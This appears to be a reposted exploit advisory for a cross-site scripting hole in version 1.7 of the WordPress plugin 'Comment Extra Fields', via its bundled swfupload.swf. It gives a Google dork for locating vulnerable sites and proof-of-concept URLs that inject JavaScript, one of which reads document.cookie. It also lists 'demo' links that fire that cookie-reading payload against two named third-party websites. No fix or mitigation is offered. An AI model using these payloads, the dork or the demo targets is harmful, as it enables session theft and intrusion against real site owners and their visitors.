Wordpress Plugins - Comment Extra Fields <== XSS



##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : http://wordpress.org/extend/plugins/comment-extra-field/
# Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################


# Description :
================
JavaScript Code injecton (XSRF/XSS) .
remote attacker can include a remote Images or exec some JS code.


# PoC
=====
=> XSRF/XSS Injection :
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>


# Demo:
=======
http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>


# Thanks
=========
CyberSEC Team - TBD - 1337day - PacketStormSecurity

Postingan terkait:

Belum ada tanggapan untuk "Wordpress Plugins - Comment Extra Fields <== XSS"

Post a Comment